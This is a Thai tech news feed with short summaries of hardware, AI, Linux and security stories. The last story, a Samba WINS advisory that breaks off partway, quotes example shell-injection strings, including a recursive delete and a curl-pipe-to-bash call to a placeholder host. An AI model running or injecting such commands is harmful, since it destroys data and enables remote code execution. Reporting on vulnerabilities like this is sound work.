    🚀 “DDR5 ทะลุ 13,000 MT/s ครั้งแรก!” — Corsair Vengeance และ GIGABYTE Z890 สร้างสถิติใหม่ในโลกการโอเวอร์คล็อก ในโลกของการโอเวอร์คล็อก หนึ่งในเป้าหมายที่นักเล่นระดับสูงไล่ล่ามานานคือการทำให้ DDR5 ทะลุความเร็ว 13,000 MT/s และล่าสุดก็มีคนทำสำเร็จแล้ว! นักโอเวอร์คล็อกชาวเยอรมันชื่อ “sergmann” ได้สร้างสถิติใหม่ด้วย Corsair Vengeance DDR5 บนเมนบอร์ด GIGABYTE Z890 Aorus Tachyon ICE โดยจับคู่กับซีพียู Intel Core Ultra 9 285K และใช้ไนโตรเจนเหลวในการระบายความร้อน ก่อนหน้านี้ “saltycroissant” เคยทำสถิติไว้ที่ 12,920 MT/s และเกือบจะทะลุ 13,000 MT/s แต่ sergmann แซงหน้าไปด้วยความเร็ว 13,010 MT/s ซึ่งได้รับการยืนยันจาก HWBot และ CPU-Z แม้ความเร็วจะสูงมาก แต่ latency ก็สูงเช่นกัน (CL68-127-127-127-2) ทำให้ไม่เหมาะกับการใช้งานทั่วไป แต่ถือเป็นชัยชนะเชิงเทคนิคที่แสดงถึงศักยภาพของฮาร์ดแวร์ยุคใหม่ โดยเฉพาะเมนบอร์ด Z890 และหน่วยความจำ DDR5 รุ่นล่าสุด ✅ ข้อมูลในข่าว ➡️ DDR5 ถูกโอเวอร์คล็อกทะลุ 13,000 MT/s เป็นครั้งแรก ➡️ นักโอเวอร์คล็อก “sergmann” ใช้ Corsair Vengeance DDR5 และ GIGABYTE Z890 Aorus Tachyon ICE ➡️ ซีพียูที่ใช้คือ Intel Core Ultra 9 285K ➡️ ใช้ไนโตรเจนเหลวในการระบายความร้อน ➡️ ความเร็วที่ทำได้คือ 13,010 MT/s (6504 MHz) ➡️ ได้รับการยืนยันจาก HWBot และ CPU-Z ➡️ ค่า latency อยู่ที่ CL68-127-127-127-2 ➡️ IMC to Memory Clock ratio อยู่ที่ 3:190 ➡️ ความเร็วระดับนี้ไม่เหมาะกับการใช้งานทั่วไป แต่เป็นการโชว์ศักยภาพ ➡️ เมนบอร์ด Z890 และซีพียู Ultra 200S มี memory controller ที่รองรับความเร็วสูง ➡️ Corsair, Gigabyte, Seasonic และ ThermalGrizzly มีส่วนสนับสนุนการทดสอบ https://wccftech.com/ddr5-memory-officially-pushed-over-13000-mt-s-for-the-first-time/
    WCCFTECH.COM
    It's Official: DDR5 Speed Pushed Over 13000 MT/s For The First Time With Corsair Vengeance Memory
    For the first time ever, an overclocker has broke the 13010 MT/s barrier on DDR5 memory, making a new world record.
    0 Comments 0 Shares 125 Views 0 Reviews
  • “AI ปลอมเสียงศิลปินดังในคลิปไว้อาลัย Charlie Kirk” — เมื่อ YouTube กลายเป็นเวทีของบทเพลงที่ไม่มีใครร้องจริง

    ผู้ใช้ YouTube หลายคนตกใจเมื่อพบคลิปไว้อาลัย Charlie Kirk นักเคลื่อนไหวฝ่ายขวาที่ถูกลอบสังหาร โดยมีเสียงร้องจากศิลปินดังอย่าง Adele, Ed Sheeran และ Justin Bieber — แต่ทั้งหมดเป็นเสียงที่สร้างจาก AI โดยไม่มีการร้องจริงหรือรับรู้จากเจ้าตัว

    คลิปเหล่านี้ใช้ภาพประกอบที่ดูสมจริง เช่น thumbnails ที่ศิลปินร้องไห้ พร้อมเนื้อเพลงที่แต่งขึ้นจาก prompt เช่น “The angels sing your name” หรือ “Your story’s written in the stars” ซึ่งสร้างความซาบซึ้งให้ผู้ชมจำนวนมาก แม้เสียงจะไม่เหมือนต้นฉบับก็ตาม

    AI music generators อย่าง Suno สามารถสร้างเพลงจากข้อความง่าย ๆ เช่น “ทำเพลงแจ๊สเกี่ยวกับรดน้ำต้นไม้” หรือ “เพลงแนว house เกี่ยวกับลาออกจากงาน” และเมื่อสื่อ AFP ทดสอบด้วย prompt ไว้อาลัยนักเคลื่อนไหว ก็ได้เพลงชื่อ “Star Gone Too Soon” และ “Echoes of a Flame” ภายในไม่กี่วินาที

    แม้ YouTube จะมีนโยบายให้ผู้สร้างเนื้อหาต้องเปิดเผยว่าใช้ AI แต่หลายคลิปกลับซ่อนข้อมูลไว้ในคำอธิบายที่ต้องคลิกขยายถึงจะเห็น

    นักวิจารณ์เช่น Alex Mahadevan จาก Poynter เตือนว่า “อินเทอร์เน็ตที่เคยเต็มไปด้วยคนสร้างสรรค์กำลังถูกแทนที่ด้วย AI slop ที่สร้างเพื่อเงิน” และ Lucas Hansen จาก CivAI เสริมว่า “การลอกเลียนเสียงและภาพควรได้รับการคุ้มครอง แม้จะเป็นคนที่เสียชีวิตแล้วก็ตาม”

    ข้อมูลในข่าว
    คลิปไว้อาลัย Charlie Kirk ใช้เสียง AI ปลอมเป็นศิลปินดัง
    มี thumbnails ปลอม เช่นภาพศิลปินร้องไห้
    เนื้อเพลงสร้างจาก prompt เช่น “Your story’s written in the stars”
    AI music generators อย่าง Suno สร้างเพลงจากข้อความได้ภายในวินาที
    YouTube มีนโยบายให้เปิดเผยการใช้ AI แต่หลายคลิปซ่อนข้อมูลไว้
    คลิปเหล่านี้มีผู้ชมหลายล้านและคอมเมนต์ขอบคุณศิลปินที่ไม่ได้ร้องจริง
    Alex Mahadevan เตือนว่าอินเทอร์เน็ตกำลังถูกแทนที่ด้วย “AI slop”
    Lucas Hansen เสนอให้คุ้มครองเสียงและภาพของบุคคล แม้จะเสียชีวิตแล้ว
    The Velvet Sundown วง AI บน Spotify มีผู้ฟังเกิน 200,000 คน
    Suno เสนอ prompt เช่น “เพลงแจ๊สเกี่ยวกับรดน้ำต้นไม้”

    https://www.thestar.com.my/tech/tech-news/2025/10/17/youtube-users-trip-over-fake-ai-tributes-to-charlie-kirk
    🎤 “AI ปลอมเสียงศิลปินดังในคลิปไว้อาลัย Charlie Kirk” — เมื่อ YouTube กลายเป็นเวทีของบทเพลงที่ไม่มีใครร้องจริง ผู้ใช้ YouTube หลายคนตกใจเมื่อพบคลิปไว้อาลัย Charlie Kirk นักเคลื่อนไหวฝ่ายขวาที่ถูกลอบสังหาร โดยมีเสียงร้องจากศิลปินดังอย่าง Adele, Ed Sheeran และ Justin Bieber — แต่ทั้งหมดเป็นเสียงที่สร้างจาก AI โดยไม่มีการร้องจริงหรือรับรู้จากเจ้าตัว คลิปเหล่านี้ใช้ภาพประกอบที่ดูสมจริง เช่น thumbnails ที่ศิลปินร้องไห้ พร้อมเนื้อเพลงที่แต่งขึ้นจาก prompt เช่น “The angels sing your name” หรือ “Your story’s written in the stars” ซึ่งสร้างความซาบซึ้งให้ผู้ชมจำนวนมาก แม้เสียงจะไม่เหมือนต้นฉบับก็ตาม AI music generators อย่าง Suno สามารถสร้างเพลงจากข้อความง่าย ๆ เช่น “ทำเพลงแจ๊สเกี่ยวกับรดน้ำต้นไม้” หรือ “เพลงแนว house เกี่ยวกับลาออกจากงาน” และเมื่อสื่อ AFP ทดสอบด้วย prompt ไว้อาลัยนักเคลื่อนไหว ก็ได้เพลงชื่อ “Star Gone Too Soon” และ “Echoes of a Flame” ภายในไม่กี่วินาที แม้ YouTube จะมีนโยบายให้ผู้สร้างเนื้อหาต้องเปิดเผยว่าใช้ AI แต่หลายคลิปกลับซ่อนข้อมูลไว้ในคำอธิบายที่ต้องคลิกขยายถึงจะเห็น นักวิจารณ์เช่น Alex Mahadevan จาก Poynter เตือนว่า “อินเทอร์เน็ตที่เคยเต็มไปด้วยคนสร้างสรรค์กำลังถูกแทนที่ด้วย AI slop ที่สร้างเพื่อเงิน” และ Lucas Hansen จาก CivAI เสริมว่า “การลอกเลียนเสียงและภาพควรได้รับการคุ้มครอง แม้จะเป็นคนที่เสียชีวิตแล้วก็ตาม” ✅ ข้อมูลในข่าว ➡️ คลิปไว้อาลัย Charlie Kirk ใช้เสียง AI ปลอมเป็นศิลปินดัง ➡️ มี thumbnails ปลอม เช่นภาพศิลปินร้องไห้ ➡️ เนื้อเพลงสร้างจาก prompt เช่น “Your story’s written in the stars” ➡️ AI music generators อย่าง Suno สร้างเพลงจากข้อความได้ภายในวินาที ➡️ YouTube มีนโยบายให้เปิดเผยการใช้ AI แต่หลายคลิปซ่อนข้อมูลไว้ ➡️ คลิปเหล่านี้มีผู้ชมหลายล้านและคอมเมนต์ขอบคุณศิลปินที่ไม่ได้ร้องจริง ➡️ Alex Mahadevan เตือนว่าอินเทอร์เน็ตกำลังถูกแทนที่ด้วย “AI slop” ➡️ Lucas Hansen เสนอให้คุ้มครองเสียงและภาพของบุคคล แม้จะเสียชีวิตแล้ว ➡️ The Velvet Sundown วง AI บน Spotify มีผู้ฟังเกิน 200,000 คน ➡️ Suno เสนอ prompt เช่น “เพลงแจ๊สเกี่ยวกับรดน้ำต้นไม้” https://www.thestar.com.my/tech/tech-news/2025/10/17/youtube-users-trip-over-fake-ai-tributes-to-charlie-kirk
    WWW.THESTAR.COM.MY
    YouTube users trip over fake AI tributes to Charlie Kirk
    Rapidly evolving artificial intelligence tools can now create songs from simple text prompts, mimicking the voices of celebrity artists to produce tributes or entire performances on demand, often without their knowledge or consent.
    0 Comments 0 Shares 169 Views 0 Reviews
  • “5 วิธีแปลงเคสคอมเก่าให้กลายเป็นของใช้สุดเจ๋ง” — จากสวนพกพาไปจนถึงเตาย่างบาร์บีคิว

    หากคุณมีเคสคอมพิวเตอร์เก่าที่ไม่ได้ใช้งานแล้ว อย่าเพิ่งรีบเอาไปทิ้ง! บทความจาก SlashGear แนะนำ 5 วิธีสุดสร้างสรรค์ในการนำเคสเก่ากลับมาใช้ใหม่ ไม่ว่าจะเป็นของตกแต่งบ้านหรืออุปกรณ์ใช้งานจริง โดยอาศัยความแข็งแรงของโครงสร้างเหล็กและพื้นที่ภายในที่ดัดแปลงได้หลากหลาย

    ไอเดียแปลงเคสคอมเก่า
    1. สวนพกพา (Portable Garden)
       - ติดตั้งหลอดไฟปลูกต้นไม้และพัดลมระบายอากาศ
      - ใช้ Mylar สะท้อนแสงภายใน และวางกระถางต้นไม้ขนาดเล็ก
      - เหมาะกับคนอยู่คอนโดหรือไม่มีพื้นที่ปลูกต้นไม้

    2. ตู้จดหมายแนวไอที (Novelty Mailbox)
      - ถอดชิ้นส่วนภายใน ติดตั้งฐานรอง และเจาะช่องรับจดหมาย
      - ถ้าเคสมีช่อง CD-ROM เดิม ก็ใช้เป็นช่องรับจดหมายได้เลย
      - สร้างความโดดเด่นให้หน้าบ้านแบบ geek ๆ

    3. ชั้นวางของติดผนัง (Stackable Shelving)
      - ถอดแผงด้านข้างและยึดเคสเข้ากับผนัง
      - วางซ้อนกันหลายเคสเพื่อสร้างชั้นวางแบบโมดูลาร์
      - ใช้เก็บหนังสือ ของตกแต่ง หรืออุปกรณ์อิเล็กทรอนิกส์

    4. กล่องเก็บเครื่องมือ (Tool Storage)
      - ใช้พื้นที่ภายในติดกล่องเก็บของขนาดเล็ก
      - ดัดแปลงให้มีลิ้นชักเลื่อนออกด้านหลัง
      - ติดสายสะพายเพื่อพกพาไปใช้งานนอกสถานที่

    5. เตาย่างบาร์บีคิว (Portable BBQ Grill)
      - วางถ่านในแนวนอน ติดตั้งตะแกรงย่างด้านบน
      - ใช้พัดลมของเคสควบคุมอุณหภูมิ
      - เหมาะกับการตั้งบนโต๊ะที่รองด้วยฟอยล์กันความร้อน

    https://www.slashgear.com/1999044/5-unexpected-uses-old-pc-towers/
    🖥️ “5 วิธีแปลงเคสคอมเก่าให้กลายเป็นของใช้สุดเจ๋ง” — จากสวนพกพาไปจนถึงเตาย่างบาร์บีคิว หากคุณมีเคสคอมพิวเตอร์เก่าที่ไม่ได้ใช้งานแล้ว อย่าเพิ่งรีบเอาไปทิ้ง! บทความจาก SlashGear แนะนำ 5 วิธีสุดสร้างสรรค์ในการนำเคสเก่ากลับมาใช้ใหม่ ไม่ว่าจะเป็นของตกแต่งบ้านหรืออุปกรณ์ใช้งานจริง โดยอาศัยความแข็งแรงของโครงสร้างเหล็กและพื้นที่ภายในที่ดัดแปลงได้หลากหลาย ✅ ไอเดียแปลงเคสคอมเก่า ➡️ 1. สวนพกพา (Portable Garden)    - ติดตั้งหลอดไฟปลูกต้นไม้และพัดลมระบายอากาศ   - ใช้ Mylar สะท้อนแสงภายใน และวางกระถางต้นไม้ขนาดเล็ก   - เหมาะกับคนอยู่คอนโดหรือไม่มีพื้นที่ปลูกต้นไม้ ➡️ 2. ตู้จดหมายแนวไอที (Novelty Mailbox)   - ถอดชิ้นส่วนภายใน ติดตั้งฐานรอง และเจาะช่องรับจดหมาย   - ถ้าเคสมีช่อง CD-ROM เดิม ก็ใช้เป็นช่องรับจดหมายได้เลย   - สร้างความโดดเด่นให้หน้าบ้านแบบ geek ๆ ➡️ 3. ชั้นวางของติดผนัง (Stackable Shelving)   - ถอดแผงด้านข้างและยึดเคสเข้ากับผนัง   - วางซ้อนกันหลายเคสเพื่อสร้างชั้นวางแบบโมดูลาร์   - ใช้เก็บหนังสือ ของตกแต่ง หรืออุปกรณ์อิเล็กทรอนิกส์ ➡️ 4. กล่องเก็บเครื่องมือ (Tool Storage)   - ใช้พื้นที่ภายในติดกล่องเก็บของขนาดเล็ก   - ดัดแปลงให้มีลิ้นชักเลื่อนออกด้านหลัง   - ติดสายสะพายเพื่อพกพาไปใช้งานนอกสถานที่ ➡️ 5. เตาย่างบาร์บีคิว (Portable BBQ Grill)   - วางถ่านในแนวนอน ติดตั้งตะแกรงย่างด้านบน   - ใช้พัดลมของเคสควบคุมอุณหภูมิ   - เหมาะกับการตั้งบนโต๊ะที่รองด้วยฟอยล์กันความร้อน https://www.slashgear.com/1999044/5-unexpected-uses-old-pc-towers/
    WWW.SLASHGEAR.COM
    5 Unexpected Uses For Old PC Towers - SlashGear
    Many of us have old computer parts lying around, but what are you supposed to do with old PC towers? Use your creativity, and repurpose them in unexpected ways.
    0 Comments 0 Shares 153 Views 0 Reviews
  • “Claude Skills โดย Anthropic” — สร้าง AI ที่รู้จริงในงานของคุณ ด้วยระบบเสริมความสามารถแบบกำหนดเอง

    Anthropic เปิดตัว “Claude Skills” ซึ่งเป็นระบบเสริมความสามารถให้ Claude ทำงานเฉพาะทางได้ดีขึ้น โดยใช้โครงสร้างแบบ “skill folder” ที่บรรจุคำสั่ง, สคริปต์ และไฟล์ที่จำเป็น Claude จะโหลด skill เฉพาะเมื่อจำเป็นต่อภารกิจนั้น ๆ เพื่อให้ทำงานเร็วและแม่นยำ

    Claude Skills ทำงานได้กับทุกผลิตภัณฑ์ของ Claude — ทั้ง Claude apps, Claude Code และ API โดยผู้ใช้สามารถสร้าง skill เองได้ผ่าน “skill-creator” ซึ่งเป็น skill พิเศษที่ช่วยตั้งโครงสร้างโฟลเดอร์, เขียนไฟล์ SKILL.md และจัดการ resource โดยไม่ต้องแก้ไขไฟล์ด้วยตนเอง

    ฟีเจอร์เด่นของ Claude Skills:

    Composable: Claude สามารถใช้หลาย skill พร้อมกันและประสานการทำงานอัตโนมัติ
    Portable: สร้างครั้งเดียว ใช้ได้ทุกแพลตฟอร์มของ Claude
    Efficient: โหลดเฉพาะข้อมูลที่จำเป็นเท่านั้น
    Powerful: skill สามารถมีโค้ดที่รันได้จริง ไม่ใช่แค่ข้อความคำสั่ง

    ในฝั่งนักพัฒนา API มี endpoint ใหม่ /v1/skills สำหรับจัดการเวอร์ชัน skill และต้องเปิดใช้ Code Execution Tool beta เพื่อให้ Claude รันโค้ดได้อย่างปลอดภัย

    องค์กรต่าง ๆ เช่น Box, Notion, Canva และ Rakuten ได้ใช้ Claude Skills เพื่อปรับแต่งการทำงานให้ตรงกับบริบทของตน เช่น สร้างเอกสารตามมาตรฐานองค์กร, ทำงานร่วมกับ Notion ได้เร็วขึ้น, หรือวิเคราะห์ spreadsheet ทางบัญชีได้แม่นยำ

    ข้อมูลในข่าว
    Claude Skills คือระบบเสริมความสามารถให้ Claude ทำงานเฉพาะทางได้ดีขึ้น
    ใช้โครงสร้าง skill folder ที่มีคำสั่ง, สคริปต์ และ resource
    Claude โหลด skill เฉพาะเมื่อจำเป็นต่อภารกิจ
    ใช้ได้กับ Claude apps, Claude Code และ API
    “skill-creator” ช่วยสร้าง skill ได้แบบ interactive โดยไม่ต้องแก้ไฟล์เอง
    Claude สามารถใช้หลาย skill พร้อมกัน (Composable)
    สร้าง skill ครั้งเดียว ใช้ได้ทุกแพลตฟอร์ม (Portable)
    โหลดเฉพาะข้อมูลที่จำเป็น (Efficient)
    skill สามารถมีโค้ดที่รันได้จริง (Powerful)
    API มี endpoint /v1/skills สำหรับจัดการ skill
    ต้องเปิดใช้ Code Execution Tool beta เพื่อรันโค้ด
    Box ใช้ Claude สร้างเอกสารจากไฟล์ที่เก็บไว้
    Notion ใช้ Claude เพื่อลดการเขียน prompt ซับซ้อน
    Canva ใช้ Claude เพื่อสร้างดีไซน์ตามบริบททีม
    Rakuten ใช้ Claude วิเคราะห์ spreadsheet และสร้างรายงาน

    https://www.anthropic.com/news/skills
    🧠 “Claude Skills โดย Anthropic” — สร้าง AI ที่รู้จริงในงานของคุณ ด้วยระบบเสริมความสามารถแบบกำหนดเอง Anthropic เปิดตัว “Claude Skills” ซึ่งเป็นระบบเสริมความสามารถให้ Claude ทำงานเฉพาะทางได้ดีขึ้น โดยใช้โครงสร้างแบบ “skill folder” ที่บรรจุคำสั่ง, สคริปต์ และไฟล์ที่จำเป็น Claude จะโหลด skill เฉพาะเมื่อจำเป็นต่อภารกิจนั้น ๆ เพื่อให้ทำงานเร็วและแม่นยำ Claude Skills ทำงานได้กับทุกผลิตภัณฑ์ของ Claude — ทั้ง Claude apps, Claude Code และ API โดยผู้ใช้สามารถสร้าง skill เองได้ผ่าน “skill-creator” ซึ่งเป็น skill พิเศษที่ช่วยตั้งโครงสร้างโฟลเดอร์, เขียนไฟล์ SKILL.md และจัดการ resource โดยไม่ต้องแก้ไขไฟล์ด้วยตนเอง ฟีเจอร์เด่นของ Claude Skills: 🧩 Composable: Claude สามารถใช้หลาย skill พร้อมกันและประสานการทำงานอัตโนมัติ 🌍 Portable: สร้างครั้งเดียว ใช้ได้ทุกแพลตฟอร์มของ Claude ⚡ Efficient: โหลดเฉพาะข้อมูลที่จำเป็นเท่านั้น 🔧 Powerful: skill สามารถมีโค้ดที่รันได้จริง ไม่ใช่แค่ข้อความคำสั่ง ในฝั่งนักพัฒนา API มี endpoint ใหม่ /v1/skills สำหรับจัดการเวอร์ชัน skill และต้องเปิดใช้ Code Execution Tool beta เพื่อให้ Claude รันโค้ดได้อย่างปลอดภัย องค์กรต่าง ๆ เช่น Box, Notion, Canva และ Rakuten ได้ใช้ Claude Skills เพื่อปรับแต่งการทำงานให้ตรงกับบริบทของตน เช่น สร้างเอกสารตามมาตรฐานองค์กร, ทำงานร่วมกับ Notion ได้เร็วขึ้น, หรือวิเคราะห์ spreadsheet ทางบัญชีได้แม่นยำ ✅ ข้อมูลในข่าว ➡️ Claude Skills คือระบบเสริมความสามารถให้ Claude ทำงานเฉพาะทางได้ดีขึ้น ➡️ ใช้โครงสร้าง skill folder ที่มีคำสั่ง, สคริปต์ และ resource ➡️ Claude โหลด skill เฉพาะเมื่อจำเป็นต่อภารกิจ ➡️ ใช้ได้กับ Claude apps, Claude Code และ API ➡️ “skill-creator” ช่วยสร้าง skill ได้แบบ interactive โดยไม่ต้องแก้ไฟล์เอง ➡️ Claude สามารถใช้หลาย skill พร้อมกัน (Composable) ➡️ สร้าง skill ครั้งเดียว ใช้ได้ทุกแพลตฟอร์ม (Portable) ➡️ โหลดเฉพาะข้อมูลที่จำเป็น (Efficient) ➡️ skill สามารถมีโค้ดที่รันได้จริง (Powerful) ➡️ API มี endpoint /v1/skills สำหรับจัดการ skill ➡️ ต้องเปิดใช้ Code Execution Tool beta เพื่อรันโค้ด ➡️ Box ใช้ Claude สร้างเอกสารจากไฟล์ที่เก็บไว้ ➡️ Notion ใช้ Claude เพื่อลดการเขียน prompt ซับซ้อน ➡️ Canva ใช้ Claude เพื่อสร้างดีไซน์ตามบริบททีม ➡️ Rakuten ใช้ Claude วิเคราะห์ spreadsheet และสร้างรายงาน https://www.anthropic.com/news/skills
    WWW.ANTHROPIC.COM
    Claude Skills: Customize AI for your workflows
    Build custom Skills to teach Claude specialized tasks. Create once, use everywhere—from spreadsheets to coding. Available across Claude.ai, API, and Code.
    0 Comments 0 Shares 106 Views 0 Reviews
  • “GNOME 49.1 มาแล้ว!” — อัปเดตครั้งใหญ่เพื่อความเสถียร ความเข้าถึง และประสบการณ์ผู้ใช้ที่ดีขึ้น

    GNOME Project ได้ปล่อย GNOME 49.1 ซึ่งเป็นอัปเดตแรกของซีรีส์ GNOME 49 “Brescia” โดยเน้นการแก้ไขบั๊กและปรับปรุงประสบการณ์ใช้งานในหลายส่วนของเดสก์ท็อป รวมถึง Nautilus, Epiphany, GNOME Shell, Mutter, Orca และ GNOME Software

    การเปลี่ยนแปลงสำคัญ ได้แก่:
    ปรับปรุง UI การจับภาพหน้าจอให้เข้าถึงง่ายขึ้น
    รองรับการพิมพ์ภาษาฮินดีแบบ Bolnagri บนคีย์บอร์ดจอสัมผัส
    ปรับปรุงไอคอนการเข้าถึงบนหน้าจอล็อกอิน
    แก้ไขปัญหาการแจ้งเตือนอัปเดตใน GNOME Software
    แก้ไขบั๊กที่ทำให้เกิด zombie process จาก gnome-session
    แก้ไขปัญหาโฟกัสคีย์บอร์ดใน Activities Overview
    แก้ไขปัญหา GTK popover submenu ที่ทำให้แอปค้าง
    แก้ไขปัญหาหน้าต่าง maximized ล้นใต้ panel
    แก้ไขการสลับ layout คีย์บอร์ดผ่าน xkb-options

    ใน Nautilus (Files):
    แก้ไขการ crash จาก callback ภายใน
    แก้ไขการ paste รูปภาพขนาดใหญ่
    ปรับปรุง contrast ของรายการที่ถูก cut
    แก้ไขการโฟกัสในหน้าต่างเลือกแอปเริ่มต้น
    แก้ไข sidebar drag-and-drop และการทดสอบ archive ที่ใช้เวลานาน

    ใน Epiphany (GNOME Web):
    ปรับปรุง address bar และ dropdown behavior
    แก้ไขการแสดงผลตัวอักษร non-Latin
    เพิ่ม OpenSearch ให้ DuckDuckGo, Bing และ Google
    แก้ไข caret position หลัง Ctrl+K
    แก้ไข favicon ที่มีพื้นหลังดำให้โปร่งใส

    ใน Orca (screen reader):
    เพิ่มการควบคุม caret สำหรับทุก text object
    เพิ่มคำสั่งใหม่ผ่าน D-Bus Remote Controller
    ปรับปรุงการอ่าน voice name และการจัดเรียงใน Preferences
    เพิ่ม OnlyShowIn=GNOME ให้ Orca autostart ได้ในเวอร์ชันเก่า

    GNOME Control Center ก็ได้รับการปรับปรุงหลาย panels เช่น Appearance, Date & Time, Mouse, Network, Users และ Wacom ส่วน GNOME Display Manager (GDM) ได้รับ hotfix สำหรับบั๊กที่ทำให้ GNOME Shell ค้าง และการตรวจสอบ Wayland ที่ผิดพลาด

    ข้อมูลในข่าว
    GNOME 49.1 เป็นอัปเดตแรกของซีรีส์ GNOME 49 “Brescia”
    ปรับปรุง accessibility, multi-touch, และการจัดการคีย์บอร์ด
    แก้ไข zombie process จาก gnome-session
    Nautilus ได้รับการแก้ไขหลายจุด เช่น paste รูปภาพ, contrast, drag-and-drop
    Epiphany ปรับปรุง address bar, dropdown, และรองรับ OpenSearch
    Orca เพิ่ม caret navigation และปรับปรุง voice name presentation
    GNOME Software แก้ไขการแจ้งเตือนอัปเดต
    GNOME Control Center ปรับปรุงหลาย panels
    GDM ได้รับ hotfix สำหรับบั๊กที่ทำให้ GNOME Shell ค้าง

    https://9to5linux.com/gnome-49-1-desktop-released-with-various-improvements-and-bug-fixes
    🖥️ “GNOME 49.1 มาแล้ว!” — อัปเดตครั้งใหญ่เพื่อความเสถียร ความเข้าถึง และประสบการณ์ผู้ใช้ที่ดีขึ้น GNOME Project ได้ปล่อย GNOME 49.1 ซึ่งเป็นอัปเดตแรกของซีรีส์ GNOME 49 “Brescia” โดยเน้นการแก้ไขบั๊กและปรับปรุงประสบการณ์ใช้งานในหลายส่วนของเดสก์ท็อป รวมถึง Nautilus, Epiphany, GNOME Shell, Mutter, Orca และ GNOME Software การเปลี่ยนแปลงสำคัญ ได้แก่: ⭐ ปรับปรุง UI การจับภาพหน้าจอให้เข้าถึงง่ายขึ้น ⭐ รองรับการพิมพ์ภาษาฮินดีแบบ Bolnagri บนคีย์บอร์ดจอสัมผัส ⭐ ปรับปรุงไอคอนการเข้าถึงบนหน้าจอล็อกอิน ⭐ แก้ไขปัญหาการแจ้งเตือนอัปเดตใน GNOME Software ⭐ แก้ไขบั๊กที่ทำให้เกิด zombie process จาก gnome-session ⭐ แก้ไขปัญหาโฟกัสคีย์บอร์ดใน Activities Overview ⭐ แก้ไขปัญหา GTK popover submenu ที่ทำให้แอปค้าง ⭐ แก้ไขปัญหาหน้าต่าง maximized ล้นใต้ panel ⭐ แก้ไขการสลับ layout คีย์บอร์ดผ่าน xkb-options ใน Nautilus (Files): 🗃️ แก้ไขการ crash จาก callback ภายใน 🗃️ แก้ไขการ paste รูปภาพขนาดใหญ่ 🗃️ ปรับปรุง contrast ของรายการที่ถูก cut 🗃️ แก้ไขการโฟกัสในหน้าต่างเลือกแอปเริ่มต้น 🗃️ แก้ไข sidebar drag-and-drop และการทดสอบ archive ที่ใช้เวลานาน ใน Epiphany (GNOME Web): 🌐 ปรับปรุง address bar และ dropdown behavior 🌐 แก้ไขการแสดงผลตัวอักษร non-Latin 🌐 เพิ่ม OpenSearch ให้ DuckDuckGo, Bing และ Google 🌐 แก้ไข caret position หลัง Ctrl+K 🌐 แก้ไข favicon ที่มีพื้นหลังดำให้โปร่งใส ใน Orca (screen reader): 🔊 เพิ่มการควบคุม caret สำหรับทุก text object 🔊 เพิ่มคำสั่งใหม่ผ่าน D-Bus Remote Controller 🔊 ปรับปรุงการอ่าน voice name และการจัดเรียงใน Preferences 🔊 เพิ่ม OnlyShowIn=GNOME ให้ Orca autostart ได้ในเวอร์ชันเก่า GNOME Control Center ก็ได้รับการปรับปรุงหลาย panels เช่น Appearance, Date & Time, Mouse, Network, Users และ Wacom ส่วน GNOME Display Manager (GDM) ได้รับ hotfix สำหรับบั๊กที่ทำให้ GNOME Shell ค้าง และการตรวจสอบ Wayland ที่ผิดพลาด ✅ ข้อมูลในข่าว ➡️ GNOME 49.1 เป็นอัปเดตแรกของซีรีส์ GNOME 49 “Brescia” ➡️ ปรับปรุง accessibility, multi-touch, และการจัดการคีย์บอร์ด ➡️ แก้ไข zombie process จาก gnome-session ➡️ Nautilus ได้รับการแก้ไขหลายจุด เช่น paste รูปภาพ, contrast, drag-and-drop ➡️ Epiphany ปรับปรุง address bar, dropdown, และรองรับ OpenSearch ➡️ Orca เพิ่ม caret navigation และปรับปรุง voice name presentation ➡️ GNOME Software แก้ไขการแจ้งเตือนอัปเดต ➡️ GNOME Control Center ปรับปรุงหลาย panels ➡️ GDM ได้รับ hotfix สำหรับบั๊กที่ทำให้ GNOME Shell ค้าง https://9to5linux.com/gnome-49-1-desktop-released-with-various-improvements-and-bug-fixes
    9TO5LINUX.COM
    GNOME 49.1 Desktop Released with Various Improvements and Bug Fixes - 9to5Linux
    GNOME 49.1 is now available as the first point release to the latest GNOME 49 desktop environment series with various bug fixes.
    0 Comments 0 Shares 153 Views 0 Reviews
  • “ช่องโหว่ CVE-2025-10230 บน Samba AD DC” — เสี่ยงถูกสั่งรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน

    ทีมพัฒนา Samba ได้ออกประกาศเตือนภัยร้ายแรงเกี่ยวกับช่องโหว่ CVE-2025-10230 ซึ่งมีคะแนน CVSS เต็ม 10.0 โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีสามารถสั่งรันคำสั่งบนระบบปฏิบัติการได้จากระยะไกลโดยไม่ต้องยืนยันตัวตน หากระบบนั้นเปิดใช้งาน WINS server และมีการตั้งค่า “wins hook” ในไฟล์ smb.conf

    ช่องโหว่นี้เกิดจากการที่ Samba ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเพียงพอ เมื่อมีการลงทะเบียนหรือเปลี่ยนชื่อ NetBIOS ผ่าน WINS server ระบบจะเรียกใช้โปรแกรมที่กำหนดไว้ใน “wins hook” โดยนำข้อมูลที่ผู้ใช้ส่งมาไปใส่ในคำสั่ง shell โดยตรง ซึ่งเปิดช่องให้แฮกเกอร์แทรกคำสั่งอันตราย เช่น ; rm -rf / หรือ | curl malicious.site | bash

    เนื่องจาก WINS เป็นโปรโตคอลเก่าที่เชื่อถือข้อมูลจาก client โดยไม่ตรวจสอบอย่างเข้มงวด ผู้โจมตีสามารถส่งชื่อ NetBIOS ที่มีความยาวไม่เกิน 15 ตัวอักษรและแฝงตัวอักขระ shell เพื่อรันคำสั่งบนเครื่องเป้าหมายได้ทันที

    ช่องโหว่นี้มีผลเฉพาะกับ Samba ที่ทำหน้าที่เป็น Active Directory Domain Controller และเปิดใช้งาน WINS พร้อมตั้งค่า “wins hook” เท่านั้น ส่วน Samba ที่เป็น member server หรือ standalone host จะไม่ได้รับผลกระทบ

    ทีม Samba แนะนำให้ผู้ดูแลระบบ:
    ลบหรือไม่ตั้งค่า “wins hook” ใน smb.conf
    ปิดการใช้งาน WINS server (wins support = no)
    อัปเดตเป็นเวอร์ชันที่ปลอดภัย เช่น 4.23.2, 4.22.5 หรือ 4.21.9

    ข้อมูลในข่าว
    ช่องโหว่ CVE-2025-10230 มีคะแนน CVSS 10.0 เต็ม
    เกิดจากการใช้ข้อมูลจาก client โดยไม่ตรวจสอบก่อนส่งเข้า shell
    ส่งผลให้สามารถรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน
